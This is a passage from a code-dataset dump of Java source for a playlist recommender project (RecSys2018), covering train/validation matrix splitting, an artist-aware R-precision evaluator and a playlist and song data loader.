dates[j];\n\t\t\t\t\t\tjtrain++;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttrainRows[rowIndex] = new MLSparseVector(indexesTrain,\n\t\t\t\t\t\tvaluesTrain, datesTrain, R.getNCols());\n\t\t\t\tnnzTrain.addAndGet(indexesTrain.length);\n\n\t\t\t\tif (indexesValid.length > 0) {\n\t\t\t\t\t// avoid empty rows\n\t\t\t\t\tvalidRows[rowIndex] = new MLSparseVector(indexesValid,\n\t\t\t\t\t\t\tvaluesValid, datesValid, 
R.getNCols());\n\t\t\t\t\tnnzValid.addAndGet(indexesValid.length);\n\t\t\t\t}\n\t\t\t});\n\n\t\t\tthis.Rstrain.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(trainRows, R.getNCols()));\n\t\t\tthis.Rsvalid.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(validRows, R.getNCols()));\n\t\t\tSystem.out.println(\"split() valid interaction \" + entry.getKey()\n\t\t\t\t\t+ \" nnz train:\" + nnzTrain.get() + \" nnz valid:\"\n\t\t\t\t\t+ nnzValid.get());\n\t\t}\n\t}\n\n\tpublic void splitByDate(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff) {\n\n\t\t// use all rows and all cols for validation\n\t\tint nRows = Rs.entrySet().iterator().next().getValue().getNRows();\n\t\tint nCols = Rs.entrySet().iterator().next().getValue().getNCols();\n\n\t\tsplitByDate(Rs, dateCutOff, null, nRows, nCols, false);\n\t}\n\n\tpublic void splitByDate(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff, final Set<String> interToSkip,\n\t\t\tfinal int nValidRows, final int nValidCols,\n\t\t\tfinal boolean coldStart) {\n\n\t\t// generate forward in time split\n\t\tsplit(Rs, dateCutOff);\n\n\t\t// get target row and column indices\n\t\tthis.validRowIndexes = getRowIndexes(interToSkip, nValidRows,\n\t\t\t\tthis.Rsvalid);\n\t\tthis.validColIndexes = getColIndexes(interToSkip, nValidCols,\n\t\t\t\tthis.validRowIndexes, this.Rsvalid);\n\n\t\tif (coldStart == true) {\n\t\t\t// remove selected training rows to simulate cold start\n\t\t\tfor (Map.Entry<String, MLSparseMatrix> entry : this.Rstrain\n\t\t\t\t\t.entrySet()) {\n\t\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\t\tfor (int index : this.validRowIndexes) {\n\t\t\t\t\tR.setRow(null, index);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic void splitFrac(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal float frac, final int minToSplit,\n\t\t\tfinal Set<String> interToSkip, final boolean useDate,\n\t\t\tfinal int nValidRows, final int nValidCols) {\n\t\tthis.Rstrain = new HashMap<String, 
MLSparseMatrix>();\n\t\tthis.Rsvalid = new HashMap<String, MLSparseMatrix>();\n\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tMLSparseMatrix R = entry.getValue();\n\n\t\t\tMLSparseVector[] trainRows = new MLSparseVector[R.getNRows()];\n\t\t\tMLSparseVector[] validRows = new MLSparseVector[R.getNRows()];\n\n\t\t\tAtomicInteger nnzTrain = new AtomicInteger(0);\n\t\t\tAtomicInteger nnzValid = new AtomicInteger(0);\n\t\t\tIntStream.range(0, R.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tint[] indexes = row.getIndexes();\n\t\t\t\tfloat[] values = row.getValues();\n\t\t\t\tlong[] dates = row.getDates();\n\n\t\t\t\tint nTotal = indexes.length;\n\t\t\t\tint nInValid = 0;\n\t\t\t\tif (nTotal < minToSplit) {\n\t\t\t\t\t// not enough to split\n\t\t\t\t\ttrainRows[rowIndex] = row.deepCopy();\n\t\t\t\t\treturn;\n\t\t\t\t}\n\n\t\t\t\tnInValid = (int) Math.ceil(frac * nTotal);\n\t\t\t\tSet<Integer> validIndexes = new HashSet<Integer>();\n\t\t\t\tif (useDate == false) {\n\t\t\t\t\t// randomly generate valid indexes\n\t\t\t\t\t// TODO: make this deterministic\n\t\t\t\t\tRandom random = new Random(rowIndex);\n\t\t\t\t\twhile (validIndexes.size() < nInValid) {\n\t\t\t\t\t\tint i = random.nextInt(nTotal);\n\t\t\t\t\t\tif (validIndexes.contains(indexes[i]) == false) {\n\t\t\t\t\t\t\tvalidIndexes.add(indexes[i]);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t// sort by date and take *last* frac indexes for validation\n\t\t\t\t\tMLMatrixElement[] elements = new MLMatrixElement[indexes.length];\n\t\t\t\t\tfor (int i = 0; i < indexes.length; i++) {\n\t\t\t\t\t\telements[i] = new MLMatrixElement(rowIndex, indexes[i],\n\t\t\t\t\t\t\t\tvalues[i], dates[i]);\n\t\t\t\t\t}\n\t\t\t\t\tArrays.sort(elements,\n\t\t\t\t\t\t\tnew MLMatrixElement.DateComparator(true));\n\t\t\t\t\tfor (int i = 0; i < nInValid; i++) 
{\n\t\t\t\t\t\tvalidIndexes.add(elements[i].getColIndex());\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// split using validIndexes\n\t\t\t\tint jtrain = 0;\n\t\t\t\tint[] indexesTrain = new int[nTotal - nInValid];\n\t\t\t\tfloat[] valuesTrain = new float[nTotal - nInValid];\n\t\t\t\tlong[] datesTrain = null;\n\t\t\t\tif (dates != null) {\n\t\t\t\t\tdatesTrain = new long[nTotal - nInValid];\n\t\t\t\t}\n\n\t\t\t\tint jvalid = 0;\n\t\t\t\tint[] indexesValid = new int[nInValid];\n\t\t\t\tfloat[] valuesValid = new float[nInValid];\n\t\t\t\tlong[] datesValid = null;\n\t\t\t\tif (dates != null) {\n\t\t\t\t\tdatesValid = new long[nInValid];\n\t\t\t\t}\n\n\t\t\t\tfor (int i = 0; i < dates.length; i++) {\n\t\t\t\t\tif (validIndexes.contains(indexes[i]) == true) {\n\t\t\t\t\t\tindexesValid[jvalid] = indexes[i];\n\t\t\t\t\t\tvaluesValid[jvalid] = values[i];\n\t\t\t\t\t\tif (dates != null) {\n\t\t\t\t\t\t\tdatesValid[jvalid] = dates[i];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjvalid++;\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tindexesTrain[jtrain] = indexes[i];\n\t\t\t\t\t\tvaluesTrain[jtrain] = values[i];\n\t\t\t\t\t\tif (dates != null) {\n\t\t\t\t\t\t\tdatesTrain[jtrain] = dates[i];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjtrain++;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttrainRows[rowIndex] = new MLSparseVector(indexesTrain,\n\t\t\t\t\t\tvaluesTrain, datesTrain, R.getNCols());\n\t\t\t\tnnzTrain.addAndGet(indexesTrain.length);\n\n\t\t\t\tif (indexesValid.length > 0) {\n\t\t\t\t\t// avoid empty rows\n\t\t\t\t\tvalidRows[rowIndex] = new MLSparseVector(indexesValid,\n\t\t\t\t\t\t\tvaluesValid, datesValid, R.getNCols());\n\t\t\t\t\tnnzValid.addAndGet(indexesValid.length);\n\t\t\t\t}\n\t\t\t});\n\n\t\t\tthis.Rstrain.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(trainRows, R.getNCols()));\n\t\t\tthis.Rsvalid.put(entry.getKey(),\n\t\t\t\t\tnew MLSparseMatrixAOO(validRows, R.getNCols()));\n\n\t\t\t// get target row and column indices\n\t\t\tthis.validRowIndexes = getRowIndexes(interToSkip, 
nValidRows,\n\t\t\t\t\tthis.Rsvalid);\n\t\t\tthis.validColIndexes = getColIndexes(interToSkip, nValidCols,\n\t\t\t\t\tthis.validRowIndexes, this.Rsvalid);\n\n\t\t\tSystem.out.println(\"split() valid interaction \" + entry.getKey()\n\t\t\t\t\t+ \" nnz train:\" + nnzTrain.get() + \" nnz valid:\"\n\t\t\t\t\t+ nnzValid.get());\n\t\t}\n\t}\n\n\tprivate static int[] getColIndexes(final Set<String> interToSkip,\n\t\t\tfinal int nValidCols, final int[] validRowIndexes,\n\t\t\tfinal Map<String, MLSparseMatrix> Rs) {\n\n\t\tint nCols = Rs.entrySet().iterator().next().getValue().getNCols();\n\t\tif (nValidCols > nCols) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"nValidCols=\" + nValidCols + \" nCols=\" + nCols);\n\t\t}\n\n\t\tif (nValidCols == nCols) {\n\t\t\t// use all columns\n\t\t\tint[] validColIndexes = new int[nCols];\n\t\t\tfor (int i = 0; i < nCols; i++) {\n\t\t\t\tvalidColIndexes[i] = i;\n\t\t\t}\n\t\t\treturn validColIndexes;\n\t\t}\n\n\t\t// find all candidate column ids that appear in the valid set\n\t\tSet<Integer> validCols = null;\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tif (interToSkip != null\n\t\t\t\t\t&& interToSkip.contains(entry.getKey()) == true) {\n\t\t\t\t// skip these interaction types\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\tif (validCols == null) {\n\t\t\t\tvalidCols = new HashSet<Integer>(R.getNCols());\n\t\t\t}\n\n\t\t\tfor (int rowIndex : validRowIndexes) {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tfor (int colIndex : row.getIndexes()) {\n\t\t\t\t\tvalidCols.add(colIndex);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif (validCols.size() > nValidCols) {\n\t\t\t// randomly select nValidCols\n\t\t\tList<Integer> validIndexesPerm = new ArrayList<Integer>(validCols);\n\t\t\tCollections.shuffle(validIndexesPerm, new Random(1));\n\n\t\t\tvalidCols = new 
HashSet<Integer>();\n\t\t\tvalidCols.addAll(validIndexesPerm.subList(0, nValidCols));\n\n\t\t} else {\n\t\t\t// backfill with random sampling\n\t\t\tint[] colIndexesRemain = new int[nCols - validCols.size()];\n\t\t\tint cur = 0;\n\t\t\tfor (int i = 0; i < nCols; i++) {\n\t\t\t\tif (validCols.contains(i) == false) {\n\t\t\t\t\tcolIndexesRemain[cur] = i;\n\t\t\t\t\tcur++;\n\t\t\t\t}\n\t\t\t}\n\t\t\tMLRandomUtils.shuffle(colIndexesRemain, new Random(1));\n\t\t\tfor (int i = 0; i < nValidCols - validCols.size(); i++) {\n\t\t\t\tvalidCols.add(colIndexesRemain[i]);\n\t\t\t}\n\t\t}\n\n\t\tint[] validColIndexes = new int[validCols.size()];\n\t\tint cur = 0;\n\t\tfor (int index : validCols) {\n\t\t\tvalidColIndexes[cur] = index;\n\t\t\tcur++;\n\t\t}\n\t\tArrays.sort(validColIndexes);\n\t\treturn validColIndexes;\n\t}\n\n\tprivate static int[] getRowIndexes(final Set<String> interToSkip,\n\t\t\tfinal int nValidRows, final Map<String, MLSparseMatrix> Rs) {\n\n\t\tint nRows = Rs.entrySet().iterator().next().getValue().getNRows();\n\t\tif (nValidRows > nRows) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"nValidRows=\" + nValidRows + \" nRows=\" + nRows);\n\t\t}\n\n\t\tif (nValidRows == nRows) {\n\t\t\t// use all rows\n\t\t\tint[] validRowIndexes = new int[nRows];\n\t\t\tfor (int i = 0; i < nRows; i++) {\n\t\t\t\tvalidRowIndexes[i] = i;\n\t\t\t}\n\t\t\treturn validRowIndexes;\n\t\t}\n\n\t\t// get indexes of all validation rows\n\t\tSet<Integer> validRows = null;\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tif (interToSkip != null\n\t\t\t\t\t&& interToSkip.contains(entry.getKey()) == true) {\n\t\t\t\t// skip these interaction types\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tMLSparseMatrix R = entry.getValue();\n\t\t\tif (validRows == null) {\n\t\t\t\tvalidRows = new HashSet<Integer>(R.getNRows());\n\t\t\t}\n\n\t\t\tfor (int i = 0; i < R.getNRows(); i++) {\n\t\t\t\tif (R.getRow(i) != null) 
{\n\t\t\t\t\tvalidRows.add(i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// shuffle all validation row indexes and select nValidRows\n\t\tif (validRows.size() > nValidRows) {\n\t\t\tList<Integer> validIndexesPerm = new ArrayList<Integer>(validRows);\n\t\t\tCollections.shuffle(validIndexesPerm, new Random(1));\n\n\t\t\tvalidRows = new HashSet<Integer>();\n\t\t\tvalidRows.addAll(validIndexesPerm.subList(0, nValidRows));\n\t\t}\n\t\tint[] validRowIndexes = new int[validRows.size()];\n\t\tint cur = 0;\n\t\tfor (int index : validRows) {\n\t\t\tvalidRowIndexes[cur] = index;\n\t\t\tcur++;\n\t\t}\n\t\tArrays.sort(validRowIndexes);\n\t\treturn validRowIndexes;\n\t}\n}\n" }, { "alpha_fraction": 0.6837324500083923, "alphanum_fraction": 0.6895127892494202, "avg_line_length": 27.83333396911621, "blob_id": "903e5e473258a7d3ff6b3cdfd64733a9992e5315", "content_id": "a4a2c6a618a9dbf7157715b6324bc14a026a6ebf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2422, "license_type": "permissive", "max_line_length": 74, "num_lines": 84, "path": "/src/main/java/common/EvaluatorRPrecisionArtist.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashSet;\nimport java.util.Set;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class EvaluatorRPrecisionArtist extends EvaluatorCF {\n\tpublic MLSparseMatrix songArtist;\n\n\tpublic EvaluatorRPrecisionArtist(int[] evalThreshsP,\n\t\t\tMLSparseMatrix songArtist) {\n\t\tsuper(evalThreshsP);\n\t\tthis.songArtist = songArtist;\n\t}\n\n\t@Override\n\tpublic ResultCF evaluate(final SplitterCF split,\n\t\t\tfinal String interactionType, final FloatElement[][] preds) {\n\n\t\tdouble[] rPrecision = new double[] { 0.0 };\n\t\tMLSparseMatrix validMatrix = split.getRsvalid().get(interactionType);\n\t\tAtomicInteger nTotal = new AtomicInteger(0);\n\t\tint[] 
validRowIndexes = split.getValidRowIndexes();\n\t\tIntStream.range(0, validRowIndexes.length).parallel().forEach(index -> {\n\n\t\t\tint rowIndex = validRowIndexes[index];\n\t\t\tMLSparseVector row = validMatrix.getRow(rowIndex);\n\t\t\tFloatElement[] rowPreds = preds[rowIndex];\n\n\t\t\tif (row == null || rowPreds == null) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tnTotal.incrementAndGet();\n\n\t\t\tdouble nMatched = 0;\n\t\t\tint[] targetIndexes = row.getIndexes();\n\n\t\t\t// get indexes of all artists of the target songs\n\t\t\tSet<Integer> artistIndexes = new HashSet<Integer>();\n\t\t\tfor (int songIndex : targetIndexes) {\n\n\t\t\t\tMLSparseVector artist = songArtist.getRow(songIndex);\n\t\t\t\tif (artist == null) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tfor (int artistIndex : artist.getIndexes()) {\n\t\t\t\t\tartistIndexes.add(artistIndex);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// set of artist Indexes that's already matched, since it\n\t\t\t// only counts once\n\t\t\tSet<Integer> artistIndexes_already_matched = new HashSet<Integer>();\n\n\t\t\tfor (int i = 0; i < Math.min(targetIndexes.length,\n\t\t\t\t\trowPreds.length); i++) {\n\t\t\t\tif (Arrays.binarySearch(targetIndexes,\n\t\t\t\t\t\trowPreds[i].getIndex()) >= 0) {\n\t\t\t\t\tnMatched++;\n\t\t\t\t} else {\n\t\t\t\t\tint artistIndex = songArtist.getRow(rowPreds[i].getIndex())\n\t\t\t\t\t\t\t.getIndexes()[0];\n\n\t\t\t\t\tif (artistIndexes.contains(artistIndex)\n\t\t\t\t\t\t\t&& (!artistIndexes_already_matched\n\t\t\t\t\t\t\t\t\t.contains(artistIndex))) {\n\t\t\t\t\t\tartistIndexes_already_matched.add(artistIndex);\n\t\t\t\t\t\tnMatched = nMatched + 0.25;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tsynchronized (rPrecision) {\n\t\t\t\trPrecision[0] += nMatched\n\t\t\t\t\t\t/ Math.min(targetIndexes.length, rowPreds.length);\n\t\t\t}\n\t\t});\n\n\t\trPrecision[0] = rPrecision[0] / nTotal.get();\n\t\treturn new ResultCF(\"r-precision-artist\", rPrecision, nTotal.get());\n\t}\n}\n" }, { "alpha_fraction": 0.6437702178955078, 
"alphanum_fraction": 0.6493096947669983, "avg_line_length": 29.16452407836914, "blob_id": "77db624f69cb653a7e15c47d2b053c799d63d977", "content_id": "6d840ca2a979fb095fccf7719bb3c0aa0e5da298", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 11734, "license_type": "permissive", "max_line_length": 95, "num_lines": 389, "path": "/src/main/java/main/ParsedDataLoader.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport java.io.BufferedReader;\nimport java.io.FileReader;\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.concurrent.TimeUnit;\nimport java.util.concurrent.atomic.AtomicInteger;\n\nimport common.MLFeatureTransform;\nimport common.MLMatrixElement;\nimport common.MLSparseFeature;\nimport common.MLSparseMatrixAOO;\nimport common.MLSparseVector;\nimport common.MLTextTransform;\nimport common.MLTimer;\nimport main.ParsedData.PlaylistFeature;\nimport main.ParsedData.SongExtraInfoFeature;\nimport main.ParsedData.SongFeature;\nimport net.minidev.json.JSONArray;\nimport net.minidev.json.JSONObject;\nimport net.minidev.json.parser.JSONParser;\n\npublic class ParsedDataLoader {\n\n\tprivate Data dataLoaded;\n\tpublic ParsedData dataParsed;\n\n\tpublic ParsedDataLoader(final Data dataLoadedP) {\n\t\tthis.dataLoaded = dataLoadedP;\n\t\tthis.dataParsed = new ParsedData();\n\t}\n\n\tpublic ParsedDataLoader(final ParsedData dataParsedP) {\n\t\tthis.dataParsed = dataParsedP;\n\t}\n\n\tpublic void loadPlaylists() {\n\t\tMLTimer timer = new MLTimer(\"loadPlaylists\");\n\t\ttimer.tic();\n\n\t\tint nPlaylists = this.dataLoaded.playlists.length;\n\t\tint nSongs = this.dataLoaded.songs.length;\n\n\t\tMLSparseVector[] rows = new MLSparseVector[nPlaylists];\n\t\tthis.dataParsed.interactions = new MLSparseMatrixAOO(rows, nSongs);\n\n\t\t// init playlist feature matrices\n\t\tthis.dataParsed.playlistFeatures = new 
HashMap<PlaylistFeature, MLSparseFeature>();\n\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) };\n\n\t\t\tMLTextTransform[] textTransforms;\n\t\t\tswitch (featureName) {\n\t\t\t\tcase NAME_TOKENIZED: {\n\t\t\t\t\t// tokenize playlist name\n\t\t\t\t\ttextTransforms = new MLTextTransform[] {\n\t\t\t\t\t\t\tnew MLTextTransform.LuceneAnalyzerTextTransform(\n\t\t\t\t\t\t\t\t\tnew MLTextTransform.DefaultAnalyzer()) };\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdefault: {\n\t\t\t\t\ttextTransforms = null;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(nPlaylists,\n\t\t\t\t\ttextTransforms, featTransforms, MLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.playlistFeatures.put(featureName, feature);\n\t\t}\n\t\ttimer.toc(\"init done\");\n\n\t\t// load playlists\n\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tthis.dataParsed.testIndexes = this.dataLoaded.testIndexes;\n\t\tthis.dataParsed.playlistIds = new String[nPlaylists];\n\t\t// IntStream.range(0, nPlaylists).parallel()(i -> {\n\t\tfor (int i = 0; i < nPlaylists; i++) {\n\t\t\tPlaylist playlist = this.dataLoaded.playlists[i];\n\t\t\tthis.dataParsed.playlistIds[i] = playlist.get_pid();\n\n\t\t\tTrack[] tracks = playlist.getTracks();\n\n\t\t\t// convert playlist to sparse matrix\n\t\t\tif (tracks != null && tracks.length > 0) {\n\t\t\t\tMap<Integer, MLMatrixElement> elementMap = new HashMap<Integer, MLMatrixElement>();\n\t\t\t\tfor (int j = 0; j < tracks.length; j++) {\n\t\t\t\t\tMLMatrixElement element = elementMap\n\t\t\t\t\t\t\t.get(tracks[j].getSongIndex());\n\t\t\t\t\tif (element == null) {\n\t\t\t\t\t\t// set date to position in the playlist\n\t\t\t\t\t\telement = new MLMatrixElement(i,\n\t\t\t\t\t\t\t\ttracks[j].getSongIndex(), 
1.0f,\n\t\t\t\t\t\t\t\ttracks[j].getSongPos());\n\t\t\t\t\t\telementMap.put(tracks[j].getSongIndex(), element);\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// some playlists have duplicate songs\n\t\t\t\t\t\telement.setValue(element.getValue() + 1.0f);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tMLMatrixElement[] elements = new MLMatrixElement[elementMap\n\t\t\t\t\t\t.size()];\n\t\t\t\tint curIndex = 0;\n\t\t\t\tfor (MLMatrixElement element : elementMap.values()) {\n\t\t\t\t\telements[curIndex] = element;\n\t\t\t\t\tcurIndex++;\n\t\t\t\t}\n\t\t\t\tArrays.sort(elements,\n\t\t\t\t\t\tnew MLMatrixElement.ColIndexComparator(false));\n\n\t\t\t\tint[] indexes = new int[elements.length];\n\t\t\t\tfloat[] values = new float[elements.length];\n\t\t\t\tlong[] dates = new long[elements.length];\n\t\t\t\tfor (int j = 0; j < elements.length; j++) {\n\t\t\t\t\tindexes[j] = elements[j].getColIndex();\n\t\t\t\t\tvalues[j] = elements[j].getValue();\n\t\t\t\t\tdates[j] = elements[j].getDate();\n\t\t\t\t}\n\t\t\t\trows[i] = new MLSparseVector(indexes, values, dates, nSongs);\n\t\t\t}\n\n\t\t\t// add playlist features\n\t\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\t\tswitch (featureName) {\n\t\t\t\t\tcase NAME_ORIGINAL: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, playlist.get_name());\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase NAME_REGEXED: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\tString name = playlist.get_name();\n\t\t\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t\t\t\tname = name.replaceAll(\"\\\\p{Punct}\", \" \");\n\t\t\t\t\t\t\tname = name.replaceAll(\"\\\\s+\", \" \").trim();\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, name);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase NAME_TOKENIZED: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\t// 
convert emojis to string\n\t\t\t\t\t\t\tString name = playlist.get_name();\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, name);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase N_TRACKS: {\n\t\t\t\t\t\tif (playlist.get_num_tracks() != null) {\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, new MLSparseVector(\n\t\t\t\t\t\t\t\t\t\t\tnew int[] { 0 },\n\t\t\t\t\t\t\t\t\t\t\tnew float[] {\n\t\t\t\t\t\t\t\t\t\t\t\t\tplaylist.get_num_tracks() },\n\t\t\t\t\t\t\t\t\t\t\tnull, 1));\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\t// case IS_COLLABORATIVE: {\n\t\t\t\t\t// int collab = 0;\n\t\t\t\t\t// if (playlist.get_collaborative() == true) {\n\t\t\t\t\t// collab = 1;\n\t\t\t\t\t// }\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] { collab }, null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case MODIFIED_AT: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] { TimeUnit.MILLISECONDS\n\t\t\t\t\t// .toHours(playlist\n\t\t\t\t\t// .get_modified_at()) },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case N_FOLLOWERS: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] {\n\t\t\t\t\t// playlist.get_num_followers() },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case N_EDITS: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] {\n\t\t\t\t\t// playlist.get_num_edits() },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// 
}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tint curCount = count.incrementAndGet();\n\t\t\tif (curCount % 100_000 == 0) {\n\t\t\t\ttimer.tocLoop(curCount);\n\t\t\t}\n\t\t\t// });\n\t\t}\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t.finalizeFeature(true);\n\t\t}\n\t}\n\n\tpublic void loadSongs() {\n\t\tMLTimer timer = new MLTimer(\"loadSongs\");\n\t\ttimer.tic();\n\t\tint nSongs = this.dataLoaded.songs.length;\n\n\t\t// init song feature matrices\n\t\tthis.dataParsed.songFeatures = new HashMap<SongFeature, MLSparseFeature>();\n\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) };\n\n\t\t\tMLTextTransform[] textTransforms;\n\t\t\tswitch (featureName) {\n\t\t\t\tcase TRACK_NAME: {\n\t\t\t\t\t// tokenize song name\n\t\t\t\t\ttextTransforms = new MLTextTransform[] {\n\t\t\t\t\t\t\tnew MLTextTransform.LuceneAnalyzerTextTransform(\n\t\t\t\t\t\t\t\t\tnew MLTextTransform.DefaultAnalyzer()) };\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdefault: {\n\t\t\t\t\ttextTransforms = null;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(nSongs,\n\t\t\t\t\ttextTransforms, featTransforms, MLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.songFeatures.put(featureName, feature);\n\t\t}\n\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tthis.dataParsed.songIds = new String[nSongs];\n\t\t// IntStream.range(0, nSongs).parallel()(i -> {\n\t\tfor (int i = 0; i < nSongs; i++) {\n\t\t\tSong song = this.dataLoaded.songs[i];\n\t\t\tthis.dataParsed.songIds[i] = song.get_track_uri();\n\n\t\t\t// add song features\n\t\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\t\tswitch (featureName) {\n\t\t\t\t\tcase ARTIST_ID: 
